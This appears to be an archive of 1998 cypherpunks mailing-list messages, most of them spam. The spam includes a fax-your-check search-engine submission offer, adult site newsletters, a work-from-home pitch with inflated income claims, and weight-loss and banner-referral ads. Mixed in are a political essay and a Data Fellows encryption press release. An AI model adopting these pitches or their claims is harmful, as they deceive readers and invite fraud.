WORRY FREE INTERNET TRANSACTION---WE WILL SUBMIT YOUR SITE AND E-MAIL YOUR REPORT WITHIN 48 HOURS OF RECEIPT OF YOUR FAXED CHECK....WE WON'T EVEN DEPOSIT IT UNTIL YOUR SUBMISSION IS COMPLETE...IF WE DON'T DO AS WE SAY, YOU CAN ALWAYS STOP PAYMENT ON CHECK....NOW WE HAVE TO TRUST YOU, AS WE WILL HAVE COMPLETED THE WORK BEFORE YOUR BANK HAS EVEN HONERED YOUR CHECK!!!!

RESERVE YOUR SPOT NOW!!!  DO NOT RESERVE YOUR SPOT VIA E-MAIL, MUST BE FAX!!!

YOU CAN FAX US A CHECK TO RESERVE YOUR SPOT AND WE WILL IMPORT IT INTO
OUR CHECK PROCESSING SOFTWARE, NO NEED TO MAIL IT.

MAKE IT OUT TO K.L. COMPANY AND   FAX TO 714 768-3650 WITH THE FOLLOWING INFO

YOUR NAME:
COMPANY NAME:

URL OF SITE: http://

e-mail Address:

Title of site(up to 25 words)



Description of site(up to 50 words):





Keywords(up to 6)

Phone#


QUESTIONS?


ALL ORDERS WILL BE SUBMITTED WITHIN 48 HOURS....           

we9









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gambler@msn.com
Date: Mon, 5 Oct 1998 22:42:38 -0700 (PDT)
Subject: Best online casino odds
Message-ID: <199810060542.WAA14986@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
The best odds and easy cashier options at any online casino is 
at:
<P>&nbsp;<A 
HREF="http://www.starluck.com/cgi-win/ad/merchants.exe/vendor-a30
4">Virtual
Casino</A>
<BR>Great games, graphics, and sound too.</HTML>
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUESDAY OCTOBER 6 1998 <stuffed@stuffed.net>
Date: Tue, 6 Oct 1998 02:22:52 -0700 (PDT)
To: (THE ULTIMATE DAILY SEXY SITE!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981006071000.17518.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ FOOD FETISH DELIGHT
+ ANAL ARCHIVE
+ NIMROD'S HAREM
+ EXOTIC EROTICA
+ SHOWING PINK
+ JEN'S PALACE
+ VIRGIN PUSSIES
+ ASIAN LESBOS
+ DANCING QUEENS
+ SEX HAPPY
+ BONUS PIC 1 -> http://stuffed.net/home/28577.htm
+ BONUS PIC 2 -> http://stuffed.net/home/22247.htm
+ BONUS PIC 3 -> http://stuffed.net/home/25191.htm
+ BONUS PIC 4 -> http://stuffed.net/home/6876.htm
+ BONUS PIC 5 -> http://stuffed.net/home/26272.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

STUFFED HAS EVOLVED OVER THE LAST COUPLE OF MONTHS THANKS TO
ALL YOUR FEEDBACK.  NOW WE HAVE BOUGHT IN THOUSANDS MORE HI-
RES  PHOTOS FROM  TOP SEX  PHOTOGRAPHERS,  WE SCOUR  THE WEB
EACH DAY TO FIND LINKS TO SITES WITH  100S MORE FREE IMAGES,
AND THERE'S SO MUCH MORE,  SUCH AS THE FIVE EXTRA BONUS PICS
YOU GET  EVERY DAY NOW,  THAT YOU WON'T FIND  ON THE STUFFED
WEB SITE, THEY ARE EXCLUSIVE TO OUR SUBSCRIBERS! AND THERE'S
SO MUCH MORE TO COME, SO KEEP COMING BACK FOR MORE EACH DAY!

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: positzzzsu@mailexcite.com
Date: Tue, 6 Oct 1998 21:11:50 -0700 (PDT)
To: positzzzsu@mailexcite.com
Subject: 725+ Search Engines
Message-ID: <199810070508.XAA18290@calli.matem.unam.mx>
MIME-Version: 1.0
Content-Type: text/plain


!!!LOWEST PRICE EVER!!!!!

REGULAR $89......ONE WEEK ONLY...$59        we10 tra

WE WILL SUBMIT YOUR WEBSITE OR HOMEPAGE TO 725+ SEARCH ENGINES
AND PROVIDE YOU WITH A REPORT SHOWING ALL SUCCESSFUL SUBMISSIONS!!

WORRY FREE INTERNET TRANSACTION---WE WILL SUBMIT YOUR SITE AND E-MAIL YOUR REPORT WITHIN 48 HOURS OF RECEIPT OF YOUR FAXED CHECK....WE WON'T EVEN DEPOSIT IT UNTIL YOUR SUBMISSION IS COMPLETE...IF WE DON'T DO AS WE SAY, YOU CAN ALWAYS STOP PAYMENT ON CHECK....NOW WE HAVE TO TRUST YOU, AS WE WILL HAVE COMPLETED THE WORK BEFORE YOUR BANK HAS EVEN HONERED YOUR CHECK!!!!

RESERVE YOUR SPOT NOW!!!  DO NOT RESERVE YOUR SPOT VIA E-MAIL, MUST BE FAX!!!

YOU CAN FAX US A CHECK TO RESERVE YOUR SPOT AND WE WILL IMPORT IT INTO
OUR CHECK PROCESSING SOFTWARE, NO NEED TO MAIL IT.

MAKE IT OUT TO K.L. COMPANY AND   FAX TO 714 768-3650 WITH THE FOLLOWING INFO

YOUR NAME:
COMPANY NAME:

URL OF SITE: http://

e-mail Address:

Title of site(up to 25 words)



Description of site(up to 50 words):





Keywords(up to 6)

Phone#


QUESTIONS?


ALL ORDERS WILL BE SUBMITTED WITHIN 48 HOURS....           

we10









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Informant <inform@cosmo.dartmouth.edu>
Date: Wed, 7 Oct 1998 00:39:47 -0700 (PDT)
Subject: New information at the Informant
Message-ID: <199810070749.DAA09199@cosmo.dartmouth.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

-----------------------------------------------------------------------------
NOTE: We do NOT send unsolicited e-mail to anyone.  If you have been signed
up for our service against your will, PLEASE JUST REPLY TO THIS NOTE, saying
that you never signed up.  We will delete the account that is sending you mail
and do our best to identify the person who signed you up. (Our e-mail address
is info_adm@cosmo.dartmouth.edu; our URL is http://informant.dartmouth.edu/.)
-----------------------------------------------------------------------------

The Informant has discovered new information!

 32 new         WWW page(s)
  0 updated     WWW page(s)
  1 unreachable WWW page(s) (monitored pages only)

To see your pages, please come visit us at

  http://informant.dartmouth.edu

Remember that your username is

  cypherpunks

Power users can use the URL

  http://informant.dartmouth.edu/index.cgi?username=cypherpunks


If you did sign up with us, but are tired of receiving this e-mail, please 
visit the Web site and increase the number of days between updates, blank out 
your e-mail address, or remove yourself from the service.

Your faithful servant,

The Informant




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Wed, 7 Oct 1998 05:41:21 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Get GROOVY in Photoshop! - Extensis PhotoTools 3.0
Message-ID: <bulk.7983.19981006221152@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Get GROOVY in Photoshop! - Extensis PhotoTools 3.0

Announcing Extensis PhotoTools(tm) 3.0 

Now, create groovy, never-seen-before effects for the Web and print-with Extensis PhotoTools 3.0 
 http://www.extensis.com/products/PhotoTools

- NEW! PhotoGroove will create custom, never-seen-before bevel effects 
- NEW! PhotoTexture creates an infinite variety of seamless natural and synthetic textures
- NEW! PhotoAnimator automatically generates animated GIFs for the Web
- IMPROVED! PhotoCastShadow now displays shadows from multiple light sources
- IMPROVED! PhotoButton offers custom button shapes and textured surfaces

New PhotoTools 3.0 is a significant upgrade that offers the most versatile collection of real-world special effects for Web, print, and multimedia design. PhotoTools gives the highest quality effects for textures, glows, buttons, shadows, embosses, bevels, and GIF animations! 

Even better, access all of PhotoTools' features from the NEW Extensis menu-right in Photoshop-using the commands you already know.

There is only one thing for brilliant special effects-GET GROOVY! with Extensis PhotoTools 3.0.

To ORDER, download a FREE demo, or for more information, please visit: 
http://www.extensis.com/products/PhotoTools
Or call Extensis at (800) 796-9798 or (503) 274-2020.

Extensis PhotoTools is fully compatible with Adobe(r) Photoshop(r) 4 and 5 (Mac and Windows).

PS. We have made every effort to ensure this message is being sent only to people who have expressed interest in Extensis products.  If we have sent this to you in error, please accept our apologies and reply with "REMOVE" in the subject line for automatic exclusion from future communications.  If you know someone who would like to be on our mailing list have them send an email to listmaster@extensis.com with "ADD" in the subject line and their email address in the body.

P.P.S. This message is intended for North American customers.  If you are located outside of North America and have received this message, please visit  www.extensis.com/purchase/ to find the nearest local distributor in your country




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED OCT 7 <stuffed@stuffed.net>
Date: Wed, 7 Oct 1998 02:22:42 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981007071000.25478.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ISLAND EROTICA
+ SEXY STUFF
+ FINGER LICKIN' GOOD FREE PUSS
+ SEXTREME
+ FREE SMUT
+ WHITE CHOCOLATE
+ LOVE THEATER
+ HORNY OLD LADIES
+ SPEWY'S FREE ADULT PIX
+ MIA'S SEX DESIRE
+ BONUS PIC 1 -> http://stuffed.net/home/1361.htm
+ BONUS PIC 2 -> http://stuffed.net/home/5962.htm
+ BONUS PIC 3 -> http://stuffed.net/home/11162.htm
+ BONUS PIC 4 -> http://stuffed.net/home/6796.htm
+ BONUS PIC 5 -> http://stuffed.net/home/4249.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Postal008@hanmail.com
Date: Wed, 7 Oct 1998 14:53:17 -0700 (PDT)
To: Recipients@globalwest.com
Subject: Special Delivery --->
Message-ID: <199810072028.XAA23962@mailhost.fornet.net.tr>
MIME-Version: 1.0
Content-Type: text/plain




You have just stumbled upon something very real and
LIFE CHANGING!

Work full or part time at your pace--at home or office.
NOT MLM or a 'SCAM'. Your job will be to tour your
prospects through the turnkey system utilizing strong
support teams and allow them to access and understand
the powerful opportunities available through this Association.
No Personal Selling!!

Complete training and team support is at your fingertips--
immediately!

$1,000.00 to $5,000.00 per week is typical for most
Associates within thirty days!

Turnkey leads are available!!
****************************************************************************************
If you have been looking for a home-based business
opportunity, this could be your lucky day!

Over twenty thousands individuals, like-minded
entrepreneurs, intent upon making profits,
have within the last four years, turned a
one-time investment into a powerful money making
operation !  Many are making in excess of $50,000.00 
per month. Ask to speak to some of them and hear their story!

Your growth and progression within the Association
will allow travel to exotic places, learn the secrets of
the very wealthy -- how to make money and keep it,
and a hands-on education in many other wealth building
opportunities.

Is this the right time for you? Are you ready to 'roll up
your sleeves and get to work?'

If you are, we want to hear from you.

1 800 498 4753 (serious inquiries only )

To be removed from further mailings, put "remove me"
in the subject and forward to remove-me.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ken Fowler" <info@tinvex.com>
Date: Wed, 7 Oct 1998 15:08:01 -0700 (PDT)
Subject: Thank you for your interest in The Investment Exchange!
Message-ID: <eaep.3.1.reg.K. R7O.36075.6711690972@mail.intervisual.com>
MIME-Version: 1.0
Content-Type: text/plain



You have been referred to us as having a stake in raising capital or placing 
capital. If this is correct, we trust the information below will be valuable to you. 

If we have erred, please accept our apologies. You may simply type "REMOVE" 
in the "Subject Line" above, send the reply including your email address to us. 
We will ensure you receive no further correspondence from The Investment 
Exchange. 

Established in 1986, The Investment Exchange has computer-matched many 
millions of Investors' Capital to Investment Opportunities. We are not a business 
or mortgage broker, nor are we an investment dealer. What The Investment 
Exchange provides is a network for ingenuity and capital that, when combined, 
results in a successful match. It works! 

If this interests you, please visit The Investment Exchange website, 
http://www.tinvex.com . 

Once you have had an opportunity to review the material we have provided, please 
contact the undersigned with any questions or comments. You may 
mailto:info@tinvex.com . 

Thank you for your interest. We look forward to hearing from you. 

Sincerely,
The Investment Exchange
Ken Fowler, 
President 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lose_Weight@postmark.net
Date: Wed, 7 Oct 1998 20:53:07 -0700 (PDT)
To: Lose_Weight@postmark.net
Subject: I Lost 60LBS in 3 Months! CAN U ?
Message-ID: <199810080303.UAA23349@coast.fortbragg.k12.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


*******New Scientific Discovery********
Go TO   http://www.geocities.com/RodeoDrive/Mall/9155/
Or Click  http://www.geocities.com/RodeoDrive/Mall/9155/ HERE

To Be REMOVED
Go TO http://www.geocities.com/RodeoDrive/Mall/9155/ to be removed
Or Click <A http://www.geocities.com/RodeoDrive/Mall/9155/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU OCT 8 <stuffed@stuffed.net>
Date: Thu, 8 Oct 1998 02:43:04 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981008071000.12540.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ ZEE ASS
+ FIRM BOOBS
+ GIMMIE PORN
+ DANGEROUSLY HOT FEMALES
+ ULTRA SEXXX 2000
+ ADULT PORN PICS
+ INTO THE NIGHT
+ XXXPOSE
+ SULTRY WOMEN
+ 1ST ALL AMERICAN GIRLS
+ BONUS PIC 1 -> http://stuffed.net/home/28742.htm
+ BONUS PIC 2 -> http://stuffed.net/home/17196.htm
+ BONUS PIC 3 -> http://stuffed.net/home/25298.htm
+ BONUS PIC 4 -> http://stuffed.net/home/21319.htm
+ BONUS PIC 5 -> http://stuffed.net/home/511.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrmail1241@qiakeysk.juno.com
Date: Mon, 4 Jan 1999 06:32:34 -0800 (PST)
To: nice@vapjsbah.toad.com
Subject: I am Deeply Insulted                                                                                                                                                     -wqrqhxmm
Message-ID: <afsdjxliktihmkhqgd.vyclyvstcqjr@mail.mike.cc>
MIME-Version: 1.0
Content-Type: text/html

Title: 






It has been some time since you have been back to our site. I have taken many 
new pictures of myself and think you might 
enjoy them as you  remember im a tall blond and my girlfriend is the redhead!

Click Here And Enter





























we thank you for all your business in the past!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Penrod <jpenrod@sihope.com> (by way of "Edwin E. Smith" <edsmith@IntNet.net>)
Date: Thu, 8 Oct 1998 20:06:58 -0700 (PDT)
To: edsmith@IntNet.net
Subject: Tea
Message-ID: <3.0.2.32.19981008225145.007b8df0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Tea in a Whole new Bag

by L. Neil Smith

More and more it seems that nothing can bring this country's politicos and 
bureaucrats back under control (to the extent they ever were) as the Founding 
Fathers intended. Bureaucrats are more anonymous and unreachable every year: 
no matter how incensed we get -- or how many of us get that way -- 
politicians reelect themselves like clockwork. 

Though it's all the rage among those concerned with such matters, I've never 
been satisfied that term limitation won't achieve the opposite of what's 
intended, removing a final curb on runaway do-goodery and social 
experimentation. With respect to recent passage of what's supposed to be the 
28th Amendment, the most naive American today knows more than James Madison 
did of the way politicians fix things to suit themselves. They'll override 
ratification, agree to vote raises for their successors, or simply make their 
mercenary move early in their terms, in the comforting knowledge that voters 
will have forgotten what they did by Election Day. 

It should be clear now that the imposition of Bill Clinton on the productive 
class -- by 43% of the electorate -- has only made things worse. In an age 
where half the average person's income already goes to taxes of one kind or 
another and the other half for goods and services with prices doubled by 
taxation and doubled again by regulation -- and where bureaucrats represent a 
greater threat to life, liberty, and property than politicians -- what's 
needed is something more certain than term limitation and harder to get
around 
than Madison's schedule for congressional pay hikes. 

Allow me to introduce the "Taxpayers' Equity Amendment": 

1. No elected or appointed official at any level of government may receive 
more in total salary, benefits, and expenses during his term of office -- or 
for 5 years afterward -- than his average productive-sector constituent; 
individuals, and employees of companies deriving more than 10% of their 
revenue from government will be excluded for purposes of calculating the 
average. 

2. Those subject to the Taxpayers' Equity Amendment will be required to 
participate in the Social Security system for as long as it continues to 
exist; all outside income (from a business, inheritance, investments, a 
spouse's wealth, speaking fees -- to name only a few examples) will be 
"invested in America" by being placed in randomly-selected savings and loan 
institutions until the 5-year period expires. 

3. Those subject to the Taxpayers' Equity Amendment will be required to file 
weekly income/expenditure forms for scrutiny by the IRS, the media, and the 
public; telephone hotlines and lavish rewards for "whistle-blowers" will be 
provided; all salary and benefits of officials under suspicion of having 
violated the Taxpayers' Equity Amendment will be suspended pending the
results 
of any investigation. 

4. Violations of the Taxpayers' Equity Amendment will result in summary 
removal of that official, loss of salary, benefits, expenses -- along with
all 
deposited monies -- and no fewer than 25 years in that federal maximum 
security prison currently deemed most violent; introducing, sponsoring, or 
voting for legislation meant to evade the Taxpayers' Equity Amendment, or to 
falsify the statistical base on which calculations are made, will be treated 
as violations. 

The primary goals of the Taxpayers' Equity Amendment are: 

(A) to punish politicians and bureaucrats for past, present, and future 
crimes against the lives, liberties, and property of "We the People of the 
United States", 

(B) to make sure their fortunes rise and fall with ours -- so they're forced 
to scrape along by day by day like the rest of us, one paycheck away from 
bankruptcy -- and, 

(C) to give them something better to do with their time than to continually 
threaten, at our expense, our fundamental rights and well-being. 

It'll also save taxpayers around $300 billion a year. 

The Taxpayers' Equity Amendment can begin working now, before it ever passes 
into law (even if it never does), if it's circulated widely via computer 
bulletin board networks and other means, appears frequently in magazine and 
newspaper letter columns, and if it's sent to all your favorite office
holders. 

Have fun. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI OCT 9 <stuffed@stuffed.net>
Date: Fri, 9 Oct 1998 01:49:25 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981009071000.4999.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ HARDCORE SEX WITH ZOOM
+ XXX FEMALES
+ HARDCORE IMAGES
+ FREE PORN SITE
+ THE PUSSY FARM
+ RACHEL'S UNIVERSE
+ HOIHOI GIRLS
+ BRAND X
+ NATURAL BODIES
+ XBABES
+ BONUS PIC 1 -> http://stuffed.net/home/23356.htm
+ BONUS PIC 2 -> http://stuffed.net/home/28430.htm
+ BONUS PIC 3 -> http://stuffed.net/home/6666.htm
+ BONUS PIC 4 -> http://stuffed.net/home/3074.htm
+ BONUS PIC 5 -> http://stuffed.net/home/29541.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Fri, 9 Oct 1998 09:18:56 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: MEDIA RELEASE: DATA FELLOWS SHIPS F-SECURE FILECRYPTO
Message-ID: <3.0.32.19981009182133.00996100@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain


Data Fellows Ltd.		Media Release
PL 24	  	
FIN-02231 ESPOO 		FOR IMMEDIATE RELEASE
Tel. +358 9 859 900
Fax. +358 9 8599 0599
http://www.DataFellows.com
Crypto-Sales@DataFellows.com 

DATA FELLOWS SHIPS F-SECURE FILECRYPTO 

New Product Provides On-the-Fly Protection For Sensitive Data on Personal
Computers

HELSINKI, FINLAND, October 9, 1998  -- Data Fellows, a leading developer of
data security software has started to ship F-Secure FileCrypto. The new
product provides strong, on-the-fly encryption for confidential data in the
Microsoft Windows NT 4.0 environment. 

"F-Secure FileCrypto is the only file encryption product on the market
designed for companies with thousands of PCs," says Mr. Camillo Sars,
Product Development Manager, Data Fellows. "The protection of confidential
files has never been this easy. F-Secure FileCrypto is installed over the
entire network, and automatically encrypts all files, including temporary
files created by programs and the operating system during running. The
process is completely transparent to end-users, requiring no action from
them at all." 

The administrator can define a security policy for all installed copies of
F-Secure FileCrypto. F-Secure FileCrypto will have a full support for
centralized policy-based management later this fall.

The program also features a key retrieval function. If a user forgets the
password that allows access to encrypted files, the Administrative Key
Recovery function manages the situation safely and easily.

According to Mr. Sars, "F-Secure FileCrypto is one of the first products to
integrate strong real-time encryption into the Windows file system. It
automatically encrypts data before it gets stored on the hard disk,
protecting sensitive information even in the most demanding situations. If
a PC is improperly turned off, or if a laptop computer's batteries go dead,
any open or temporary files will be encrypted and safe."

F-Secure FileCrypto also has a feature which allows users to send encrypted
e-mail to other users. Encrypted e-mail can be decrypted with a password.

F-Secure FileCrypto uses well-known fast block cipher algorithms. Either
the three-key 3DES or the Blowfish algorithm can be selected. Both
algorithms have been analyzed by the world's leading cryptographers and are
known to be strong and safe.

"Files protected by F-Secure FileCrypto are not accessible to computer
freaks, hackers, or even cryptography experts. Each file is encrypted with
a random session key. Breaking a single key would give someone access to
only one file, and the job would consume trillions of years of computer
time," says Mr. Sars.

F-Secure FileCrypto for Windows NT 4.0 is now available from the Data
Fellows resellers around the world. Central installation and management
features will be implemented in the next release of the product. F-Secure
FileCrypto for Windows 95/98 will be available next year.

About Data Fellows

Data Fellows is one of the world's leading developers of data security
software. The company's groundbreaking F-Secure products provide a unique
combination of globally available strong encryption and revolutionary
anti-virus software. The integrated F-Secure software family provides
complete security solutions for enterprises of any size. It includes file
encryption and IPsec communication encryption products, VPN gateways,
SSH-based secure remote management software, easy-to-use solutions for
distributed DNS management, and a full range of anti-virus products for
workstations, servers and gateways. Data Fellows is also the developer of
the award-winning F-PROT Professional anti-virus product, the scanning
engine which is now an integral part of the multiple engine structure of
F-Secure Anti-Virus.   

Data Fellows' head offices are in San Jose, California, and Helsinki,
Finland. In addition, its offices, partners and VARs offer worldwide
technical support, training and distribution from over 80 countries. Since
the company was founded in 1988, its annual net sales growth has
consistently been nearly 100%. Data Fellows belongs to an elite group of
companies with a triple-A rating from Dun&Bradstreet. The company is
privately owned.  

For further information, please contact

USA:
Data Fellows Inc.
Mr. Pirkka Palomki, Product Manager
Tel. +1 408 938 6700, fax  +1 408 938 6701E-mail:
Pirkka.Palomaki@DataFellows.com

Finland:
Data Fellows Ltd.
Mr. Tom Helenius, Product Marketing Manager
Tel.  +358 9 859 900, Fax. +358 9 8599 0599
E-Mail: Tom.Helenius@DataFellows.com
Visit our web site at http://www.DataFellows.com
--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "GartnerGroup" <symposium_online@listserv.gartner.com>
Date: Fri, 9 Oct 1998 16:37:09 -0700 (PDT)
To: "GartnerGroup Interactive Registered User" <subscriber@gartner.com>
Subject: Free Keynote Webcasts from Symposium/ITxpo 98!
Message-ID: <199810092337.QAA05866@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


************************************************************************
GartnerGroup periodically sends e-mail updates to registered users of
GartnerGroup Interactive about specially available research, upcoming
conferences and announcements.  If you received this message, you
registered on GartnerGroup Interactive (http://www.gartner.com).

To unsubscribe from all future e-mail updates, send an e-mail to:
unsubscribe.updates@gartner.com with the word "unsubscribe" in the
subject line.
************************************************************************


In this e-mail:
1)  Symposium/ITxpo Online -- free keynote webcasts from Orlando
2)  GartnerGroup analyst presentation webcasts
3)  Symposium/ITxpo 98 - Europe, Japan and Australia still to come


1) Symposium/ITxpo Online - Free keynote webcasts from Symposium/ITxpo
------------------------------------------------------------------------
At Symposium/ITxpo 98, in Orlando, Florida October 12-16, the largest,
most strategic event in the industry, the greatest minds in Information
Technology come together to cure confusion about IT issues and clarify
the vision of the future.

GartnerGroup is bringing Symposium/ITxpo to the Internet.  Mark your
calendar and visit Symposium/ITxpo Online at
http://www.gartner.com/symposium between October 12 and 16, 1998.

As a registered user of GartnerGroup Interactive, we are providing
special notice to you of the valuable information that will be
available for free on GartnerGroup Interactive including:

     Keynote interview webcasts
     Select analyst presentation webcasts
     Daily conference highlights
     ITxpo Online - the virtual tradeshow
     Product Education Sessions from leading vendors
     Breaking news and announcements
     Special analysis of hot IT topics & trends

The keynote presentations feature GartnerGroup analysts interviewing
industry leaders such as Bill Gates, Larry Ellison and John Chambers.
They will be presented live and on-demand on GartnerGroup Interactive,
using video webcasting technology (viewed with the Windows Media
Player or RealPlayer).  For a complete schedule of the dates and times
visit http://www.gartner.com/symposium


2)  GartnerGroup analyst presentation webcasts
------------------------------------------------------------------------
Select GartnerGroup analyst presentations will be made available free
from Symposium/ITxpo Online.  These presentations combine audio
webcasting technology and the analyst slide presentations.  (Windows
Media Player or Real Player with the slides in .pdf format)

Free session highlights:
     Developing an E-Business Strategy
     Networking Vendor Evaluations:  A Magic Quadrant Compendium
     Collaboration and Groupware Applications
     Network and Systems Management:  Risk vs. Reward

Visit http://www.gartner.com/symposium for the complete list of free
GartnerGroup analyst session webcasts.  In addition to the free
webcasts, over 215 GartnerGroup analyst sessions from Symposium/ITxpo
in Orlando are available for purchase individually or in packages.


3) Symposium/ITxpo 98 -- Europe, Japan and Australia still to come!
------------------------------------------------------------------------
Symposium/ITxpo will take place in other locations as well:

Tokyo, Japan		21-23 October, 1998
Brisbane, Australia	28-30 October, 1998
Cannes, France		2-5 November, 1998

To find out more or to register for Symposium/ITxpo 98 in your corner
of the world, visit http://www.gartner.com/symposium

GartnerGroup's Symposium/ITxpo 98 promises to be the best ever.  Visit
GartnerGroup Interactive starting October 12, 1998 and get front row
seats to the event at Symposium/ITxpo Online!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT OCT 10 <stuffed@stuffed.net>
Date: Sat, 10 Oct 1998 01:14:44 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981010071000.27258.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ DAARIA'S DEVILISH DYKES
+ NUTS N HONEY
+ HOIHOI GIRLS
+ SIBERIAN DAWGY DAWG
+ LAND O LEZ
+ A SEXY GIRL
+ FREE XXX SMUT
+ DEBBIE'S SEX SITE
+ WHORES INC
+ ALL THAT ASS
+ BONUS PIC 1 -> http://www.stuffed.net/home/17970.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/6896.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/20802.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/17597.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/25803.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: regnic902c@gte.net
Date: Sat, 10 Oct 1998 23:13:08 -0700 (PDT)
To: liprenic2x3@gte.net
Subject: A BANNER PROGRAM PAYING $50 A SIGNUP
Message-ID: <B0000205356@mail.britannic.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


$50 PER SIGNUP - NO KIDDING!
PAID WEEKLY IF YOU WISH!

This banner program should be at the top of
your links page for a couple of real important
reasons that will make perfect sense!

1.  It doesn't compete with your site - or anyone's!
2.  It pays $50 for your signups, and $10 for each one
     that anyone you refer signs up!
3.  It gives them something they need right now!

Publicize the program to other webmasters
and make $10 override on all their signups!

We will send your payments weekly anywhere
in the world . . . and the payments are guaranteed!

Want to find out more?

First, write down your referral code 000034
(that's 4 zeros and 34)

Then, click on the link below

http://206.132.179.167/kesef/

Thanks for your time!

Be one of the first on this new program --
make your own $$$ and all the overrides!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
